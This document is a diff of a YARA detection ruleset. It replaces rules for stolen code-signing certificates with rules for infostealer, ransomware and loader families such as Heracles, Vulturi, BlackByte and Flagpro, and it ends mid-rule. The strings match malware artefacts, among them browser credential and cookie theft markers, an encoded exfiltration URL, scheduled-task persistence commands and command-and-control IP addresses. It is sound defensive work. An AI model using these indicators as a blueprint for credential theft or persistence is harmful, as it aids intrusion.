+		$v1_1 = "&username=" fullword ascii
+		$v1_2 = "/card.php?data=" fullword ascii
+		$v1_3 = "/Create /tn MicrosoftDriver /sc MINUTE /tr" fullword ascii
+		$v1_4 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0" fullword ascii
+		$v1_5 = "/API/Clipper/ykesqk0o.php?cf6zrlhn=" fullword ascii
+		$v1_6 = "&di7ztth6=" fullword ascii
+		$v1_7 = "/API/Clipper/hr627gzk.php?v6etwxo5=" fullword ascii
+		$v2_1 = "bitcoincash:" fullword ascii
+		$v2_2 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" ascii
+		$re1 = "^[0-9]{16}$" fullword ascii
+		$re2 = "^[0-9]{4}\\s[0-9]{4}\\s[0-9]{4}\\s[0-9]{4}" fullword ascii
+		$re3 = "^\\d{2}\\D\\d{2}" fullword ascii
+		$re4 = "^[0-9]{3}" fullword ascii
+		$re5 = "([\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?)" fullword ascii
+		$re6 = "(\\d{2}\\D\\d{2})" fullword ascii
+		$re7 = "(\\d{3})" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fbfdddcfabc" and pe.signatures [ i ] . serial == "b0:00:9b:b0:62:f5:2e:b6:00:1b:a7:96:06:de:24:3d" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 5 of ( $v1* ) or all of ( $v2* ) ) ) or ( 3 of ( $re* ) and ( 2 of ( $v1* ) or 2 of ( $v2* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_294E7A2Ccfc28Ed02843Ecff25F2Ac98 : FILE
+rule DITEKSHEN_MALWARE_Win_Badjoke : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BadJoke / Witch"
 		author = "ditekSHen"
-		id = "ae3c0758-7863-54eb-a94f-3c86d5d34d21"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "082727d5-618f-542d-93ca-ba93be16cd80"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3230-L3241"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8816-L8831"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "75c3093978875c7e523525a3b64bf985139359d9696fdb9dbd7db3e915043194"
+		logic_hash = "4699a772bcd50d2fe43740df59a4c56598ba43ebcc18acbf8ec401b6f5a01fe6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a57a2de9b04a80e9290df865c0abd3b467318144"
-		importance = 20
+
+	strings:
+		$s1 = "msdownld.tmp" fullword ascii
+		$s2 = "UPDFILE%lu" fullword ascii
+		$s3 = "Command.com /c %s" fullword ascii
+		$s4 = "launch.cmd" fullword ascii
+		$s5 = "virus.vbs" fullword ascii
+		$s6 = "virus.py" fullword ascii
+		$m1 = "Message from Google Virus" ascii
+		$m2 = "you cannot get rid of this virus" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eadbaadbdcecafdfafbe" and pe.signatures [ i ] . serial == "29:4e:7a:2c:cf:c2:8e:d0:28:43:ec:ff:25:f2:ac:98" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $m* ) or all of ( $s* ) or ( 1 of ( $m* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_A61B5590C2D8Dc70A31F8Ea78Cda4353 : FILE
+rule DITEKSHEN_MALWARE_Win_Heracles : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Heracles infostealer"
 		author = "ditekSHen"
-		id = "0a22b3a5-cc61-5aec-9fc7-bbd03cd4ab03"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "36cb9366-c70b-5117-955f-402f87f3a88c"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3243-L3254"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8833-L8861"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7d57f5cb2691d8dfb5f5ef63f7bfb4290f0bd8d990c61fe0655e35c1b3f554f0"
+		logic_hash = "1d5c80c084f9d6e4692a18f74574179095ecdd5eaadd70b5d16c19702761d74f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "d1f77736e8594e026f67950ca2bf422bb12abc3a"
-		importance = 20
+
+	strings:
+		$x1 = "aHR0cHM6Ly9uYWNrZXIudG9hbnNlY3UuY29tL3VwbG9hZHM/a2V5PX" wide
+		$b1 = "XEdvb2dsZVxDaHJvbWVc" wide
+		$b2 = "XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3Nlcl" wide
+		$b3 = "XENvY0NvY1xCcm93c2VyX" wide
+		$b4 = "VXNlciBEYXRh" wide
+		$b5 = "RGVmYXVsdA" wide
+		$b6 = "UHJvZmlsZQ" wide
+		$b7 = "Q29va2llcw" wide
+		$b8 = "TG9naW4gRGF0YQ" wide
+		$b9 = "TG9jYWwgU3RhdGU" wide
+		$b10 = "bG9jYWxzdGF0ZQ" wide
+		$b11 = "bG9naW5kYXRh" wide
+		$s1 = "encrypted_key" fullword wide
+		$s2 = "<GetIpInfoAsync>d__" ascii
+		$s3 = "<reqHTML>5__" ascii
+		$s4 = "<idHardware>5__" ascii
+		$s5 = "<profilePaths>5__" ascii
+		$s6 = "<cookieFile>5__" ascii
+		$s7 = "<loginDataFile>5__" ascii
+		$s8 = "<localStateFile>5__" ascii
+		$s9 = "<postData>5__" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bdddcfaebffbfdcabaffe" and pe.signatures [ i ] . serial == "a6:1b:55:90:c2:d8:dc:70:a3:1f:8e:a7:8c:da:43:53" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 8 of ( $s* ) or ( 4 of ( $b* ) and 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_21C9A6Daff942F2Db6A0614D : FILE
+rule DITEKSHEN_MALWARE_Win_Onlylogger : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects OnlyLogger loader variants"
 		author = "ditekSHen"
-		id = "e09476f7-d48d-58e5-aeca-fffacf569243"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "525aa2a0-5090-5f96-999b-67ca4379f897"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3256-L3267"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8863-L8882"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c466a829d8141ba40187309559f62af73ea47e325eb95ef4c634bac60167788b"
+		logic_hash = "1b39a4d2a6d3a2633cfa98adc1dfe99d10d2493fd06c9f875c56ec7689b7a561"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "7dd9acb2ef0402883c65901ebbafd06e5293d391"
-		importance = 20
+
+	strings:
+		$s1 = { 45 6c 65 76 61 74 65 64 00 00 00 00 4e 4f 54 20 65 6c 65 76 61 74 65 64 }
+		$s2 = "\" /f & erase \"" ascii
+		$s3 = "/c taskkill /im \"" ascii
+		$s4 = "KILLME" fullword ascii
+		$s5 = "C:\\Windows\\System32\\cmd.exe" fullword ascii
+		$gn = ".php?pub=" ascii
+		$ip = /\/1[a-z0-9A-Z]{4,5}/ fullword ascii
+		$h1 = "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1" fullword ascii
+		$h2 = "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8" fullword ascii
+		$h3 = "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1" fullword ascii
+		$h4 = "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0" fullword ascii
+		$h5 = "Content-Type: application/x-www-form-urlencoded" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ledger SAS" and pe.signatures [ i ] . serial == "21:c9:a6:da:ff:94:2f:2d:b6:a0:61:4d" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( #ip > 5 and ( $gn or 3 of ( $s* ) or all of ( $h* ) ) ) or ( all of ( $h* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1F55Ae3Fca38827Cde6Cc7Ca1C0D2731 : FILE
+rule DITEKSHEN_MALWARE_Win_Blackbytego : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BlackByte ransomware Go variants"
 		author = "ditekSHen"
-		id = "8a32fa5d-671e-5012-9de1-6afc21751b94"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "25431446-8cce-54cc-925d-5d9147344c6d"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3269-L3280"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8884-L8904"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1aa7c6c5430f196d1031acabfe141c30044c23c4119619752c50f4665966606e"
+		logic_hash = "b3e6a4a2f043293e8693cfbe1515681ce0616d98e2492732fc06a01a96309883"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a279fa4186ef598c5498ba5c0037c7bd4bd57272"
-		importance = 20
+
+	strings:
+		$x1 = "BlackByteGO/_cgo_gotypes.go" fullword ascii
+		$x3 = "BlackByteGO/" ascii nocase
+		$s1 = ".Disconnect" ascii
+		$s2 = ".OpenService" ascii
+		$s3 = ".ListServices" ascii
+		$s4 = ".Start" ascii
+		$s5 = ".Encrypt" ascii
+		$s6 = ".Decrypt" ascii
+		$s7 = ".MustFindProc" ascii
+		$s8 = ".QuoRem" ascii
+		$s9 = "C:\\Windows\\regedit.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fcceaeafbbdccccddfbbb" and pe.signatures [ i ] . serial == "1f:55:ae:3f:ca:38:82:7c:de:6c:c7:ca:1c:0d:27:31" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_008D1Bae9F7Aef1A2Bcc0D392F3Edf3A36 : FILE
+rule DITEKSHEN_MALWARE_Win_Vulturi : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Vulturi infostealer"
 		author = "ditekSHen"
-		id = "8d1e7615-f462-56eb-9198-30b868572cf1"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "dca814d6-ca26-5315-9f80-628ee50e8dfa"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3282-L3293"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8906-L8931"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6b15f97a51f25b1292cc3fd80889ea1edb01814d1951ef1d3b4cac5e83c7fbca"
+		logic_hash = "4d1d88764dd72ae78a74b802e11c2f28899b7b9f45c54cf3bf7aaac49dd48d7f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5927654acf9c66912ff7b41dab516233d98c9d72"
-		importance = 20
+
+	strings:
+		$x1 = "Vulturi_" ascii wide
+		$x2 = "VulturiProject" fullword ascii
+		$s1 = { 5b 00 2d 00 5d 00 20 00 53 00 65 00 72 00 76 00
+               65 00 72 00 20 00 ?? ?? 20 00 69 00 73 00 20 00
+               6f 00 66 00 66 00 6c 00 69 00 6e 00 65 00 2e 00
+               2e 00 2e 00 00 ?? 5b 00 2b 00 5d 00 20 00 53 00
+               65 00 72 00 76 00 65 00 72 00 20 00 00 ?? ?? 00
+               69 00 73 00 20 00 6f 00 6e 00 6c 00 69 00 6e 00
+               65 00 }
+		$s2 = "Writing is not alowed" wide
+		$s3 = "System\\ProcessList.txt" fullword wide
+		$s4 = "[X] GetSSL ::" fullword wide
+		$s5 = "Failed to steal " wide
+		$s6 = "StealerStub" fullword ascii
+		$s7 = "/C chcp 65001 && netsh" wide
+		$n1 = "fetch_options" fullword wide
+		$n2 = "send_report" fullword wide
+		$n3 = "?username=" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beaffbebfeebbefbeeb" and pe.signatures [ i ] . serial == "00:8d:1b:ae:9f:7a:ef:1a:2b:cc:0d:39:2f:3e:df:3a:36" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and any of them ) or all of ( $n* ) or 5 of ( $s* ) or ( 1 of ( $n* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_239Ba103C2943D2Dff5E3211D6800D09 : FILE
+rule DITEKSHEN_MALWARE_Win_Tofsee : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Tofsee"
 		author = "ditekSHen"
-		id = "1444a44e-2f45-547f-a5fc-0941edd506bc"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "86371c0b-72f9-56c0-9f34-f14d2a069c91"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3295-L3306"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8933-L8949"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b155ba969334945013af40fbf43b8318a221f6212c4a29e0ee98bc02bb9acafb"
+		logic_hash = "9ef06643173c70c5b06b19200cb5b5efa7db7eb3516b67621f0b1975f1c80781"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d8ea0533af5c180ce1f4d6bc377b736208b3efbb"
-		importance = 20
+
+	strings:
+		$s1 = "n%systemroot%\\system32\\cmd.exe" fullword wide
+		$s2 = "loader_id" fullword ascii
+		$s3 = "start_srv" fullword ascii
+		$s4 = "lid_file_upd" fullword ascii
+		$s5 = "localcfg" fullword ascii
+		$s6 = "Incorrect respons" fullword ascii
+		$s7 = "mx connect error" fullword ascii
+		$s8 = "Error sending command (sent = %d/%d)" fullword ascii
+		$s9 = "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bcafaecbecacbca" and pe.signatures [ i ] . serial == "23:9b:a1:03:c2:94:3d:2d:ff:5e:32:11:d6:80:0d:09" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_205B80A74A5Dddedea6B84A1E1C44010 : FILE
+rule DITEKSHEN_MALWARE_Win_Khonsari : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Khonsari ransomware"
 		author = "ditekSHen"
-		id = "43e34fe4-e580-572e-a14e-5ee58b3bf594"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "2d562e62-a948-570d-8ff2-cc4835b91573"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3308-L3319"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8951-L8963"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1af8527193acdbcb3ba0239879c3b23c6ba4e68d920ae4d5ce503d44e32991f7"
+		logic_hash = "2a78f36259481fccb31b2e6248fed19699b6eb05bacfd08905414764c3045943"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "1a743595dfaa29cd215ec82a6cd29bb434b709cf"
-		importance = 20
+
+	strings:
+		$x1 = ".khonsari" fullword wide nocase
+		$s1 = "Encrypt" fullword ascii
+		$s2 = "CreateEncryptor" fullword ascii
+		$s3 = "GenerateKey" fullword ascii
+		$s4 = "277e5e6a-4da6-4138-97fa-3fecbdad0176" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Befadbffde" and pe.signatures [ i ] . serial == "20:5b:80:a7:4a:5d:dd:ed:ea:6b:84:a1:e1:c4:40:10" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( all of ( $s* ) ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6C8D0Cf4D1593Ee8Dc8D34Be71E90251 : FILE
+rule DITEKSHEN_MALWARE_Win_Quantum : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Quantum locker / ransomware"
 		author = "ditekSHen"
-		id = "fe5cbea2-1704-550c-bd2e-82defba20f24"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "76a9240e-5b4f-5a1e-9841-e5ba855fb06f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3321-L3332"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8965-L8987"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "981e4b426e926bd042f25a50de40d3e3462ed5fec0cf7261523b314b908a1276"
-		score = 75
-		quality = 75
+		logic_hash = "f35422d1f52f1f9f55a5e38c782d2cf621cd84da028358ab250584334d41249c"
+		score = 50
+		quality = 35
 		tags = "FILE"
-		thumbprint = "d481d73bcf1e45db382d0e345f3badde6735d17d"
-		importance = 20
+
+	strings:
+		$x1 = "\\t<title>Quantum</title>" ascii wide
+		$x2 = "Quantum Locker.<br><br>" ascii wide
+		$s1 = "ERROR" fullword wide
+		$s2 = ".log" fullword wide
+		$s3 = "SLOW" fullword wide
+		$s4 = "Create" fullword wide
+		$s5 = "Integrity" fullword wide
+		$s6 = "Disabled" fullword wide
+		$s7 = "Deny" fullword wide
+		$s8 = "FAST" fullword wide
+		$s9 = "Mandatory" fullword wide
+		$s10 = "plugin.dll" fullword ascii
+		$s11 = "NetGetDCName" fullword ascii
+		$s12 = "NetShareEnum" fullword ascii
+		$s13 = "NetGetJoinInformation" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dbdbecdbdfafdc" and pe.signatures [ i ] . serial == "6c:8d:0c:f4:d1:59:3e:e8:dc:8d:34:be:71:e9:02:51" )
+		( uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 9 of ( $s* ) or ( pe.number_of_exports == 2 and pe.exports ( "RunW" ) and pe.exports ( "runW" ) and 5 of ( $s* ) ) ) ) or all of ( $x* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7D08A74747557D6016Aaaf47A679312F : FILE
+rule DITEKSHEN_MALWARE_Win_Owowa : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Owowa"
 		author = "ditekSHen"
-		id = "031cf958-1c37-5190-8fbd-6896f1048c9a"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c0a61601-e810-5acc-91a3-fa70db6d94da"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3334-L3345"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8989-L9007"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ff7c9635b9b43bef7401861d5dbf984d1e2aa1ea9e4d3df9ad348c552767628e"
+		logic_hash = "afdeb30845ed4ef7b79e733e05d3e1ee53a8c441db74519577893d75c1249a41"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d7fdad88c626b8e6d076f3f414bbae353f444618"
-		importance = 20
+
+	strings:
+		$u1 = "jFuLIXpzRdateYHoVwMlfc" fullword ascii wide
+		$u2 = "Fb8v91c6tHiKsWzrulCeqO" fullword ascii wide
+		$u3 = "dEUM3jZXaDiob8BrqSy2PQO1" fullword ascii wide
+		$s1 = "powershell.exe" fullword wide
+		$s2 = "<RSAKeyValue><Modulus>" wide
+		$s3 = "HealthMailbox" fullword wide
+		$s4 = "6801b573-4cdb-4307-8d4a-3d1e2842f09f" ascii
+		$s5 = "<PreSend_RequestContent>b__" ascii
+		$s6 = "ClearHeaders" fullword ascii
+		$s7 = "get_UserHostAddress" fullword ascii
+		$s8 = "ExtenderControlDesigner" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Abfacfbdcd" and pe.signatures [ i ] . serial == "7d:08:a7:47:47:55:7d:60:16:aa:af:47:a6:79:31:2f" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $u* ) or ( 2 of ( $u* ) and 3 of ( $s* ) ) or 6 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2095C6F1Eadb65Ce02862Bd620623B92 : FILE
+rule DITEKSHEN_MALWARE_Win_Chebka : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Chebka"
 		author = "ditekSHen"
-		id = "c44d8942-569b-50c6-8363-0576c7d54dfb"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "df486522-695c-56f5-b93a-6f16829a3a3e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3347-L3358"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9009-L9030"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0b75d8c59486d197f2cdff298114a7367bb6ad4cf71ee28273e0946e42d3f7e8"
+		logic_hash = "cc8123a5d20fac51d4dfc225e743539456efb4d649060d078c3ed93e7724da01"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "940a4d4a5aadef70d8c14caac6f11d653e71800f"
-		importance = 20
+
+	strings:
+		$s1 = "-k netsvcs" wide
+		$s2 = "%ssvchost.exe -k SystemNetworkService" wide
+		$s3 = "Mozilla/4.0 (compatible)" wide
+		$s4 = "_kasssperskdy" wide
+		$s5 = "winssyslog" wide
+		$s6 = "LoaderDll%d" wide
+		$s7 = "cmd.exe /c rundll32.exe shell32.dll," wide
+		$s8 = /cmd.exe \/c start (chrome|msedge|firefox|iexplorer)\.exe/ wide
+		$f1 = ".?AVCHVncManager@@" fullword ascii
+		$f2 = ".?AVCNetstatManager@@" fullword ascii
+		$f3 = ".?AVCTcpAgentListener@@" fullword ascii
+		$f4 = ".?AVIUdpClientListener@@" fullword ascii
+		$f5 = ".?AVCShellManager@@" fullword ascii
+		$f6 = ".?AVCScreenSpy@@" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Febeecad" and pe.signatures [ i ] . serial == "20:95:c6:f1:ea:db:65:ce:02:86:2b:d6:20:62:3b:92" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $f* ) or ( 3 of ( $f* ) and 3 of ( $s* ) ) or ( #s8 > 2 and 5 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_899E32C9Bf2B533B9275C39F8F9Ff96D : FILE
+rule DITEKSHEN_MALWARE_Win_Flagpro : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Flagpro"
 		author = "ditekSHen"
-		id = "62ecae58-7576-5170-8eb5-2becd292e5de"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "da1bf899-feb5-5ed0-956e-c20bc3565a6e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3373-L3384"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9032-L9049"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c5fe3726fd19d050e762cc9e4e2099e74e3780c89a75dab55c12e16bfecd8642"
+		logic_hash = "c5e5944426b7be690ad62dd0d98a8fc6f8135cab0dbdd8a5aaf1670491eda59d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "329af76d7c84a90f2117893adc255115c3c961c7"
-		importance = 20
+
+	strings:
+		$s1 = "download...." fullword ascii
+		$s2 = "~MYTEMP" fullword wide
+		$s3 = ".?AVCV20_LoaderApp@@" fullword ascii
+		$s4 = ".?AVCV20_LoaderDlg@@" fullword ascii
+		$s5 = "ExecYes" fullword ascii
+		$s6 = /<BODY ID=CV\d+_LoaderDlg BGCOLOR=/ ascii
+		$n1 = "://139.162.87.180" wide
+		$n2 = "://172.104.109.217" wide
+		$n3 = "://org.misecure.com/index.html" wide
+		$b1 = /(get all|click|close|maybe|get_outerHTML|download\d) (finished|pass|ok|windows|failed)!/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eecaaffcbfdffaedcfec" and pe.signatures [ i ] . serial == "89:9e:32:c9:bf:2b:53:3b:92:75:c3:9f:8f:9f:f9:6d" )
+		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( 1 of ( $n* ) and ( 2 of ( $s* ) or 1 of ( $b* ) ) ) or ( 2 of ( $s* ) and 1 of ( $b* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0B5759Bc22Ad2128B8792E8535F9161E : FILE
+rule DITEKSHEN_MALWARE_Win_Nplusminer
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PowerShell based NPlusMiner"
 		author = "ditekSHen"
-		id = "c35c4e07-73d9-54d6-a8cb-1558502a82e9"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a16b504f-e69a-5abb-8e37-01bf7c2df6ef"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3386-L3397"
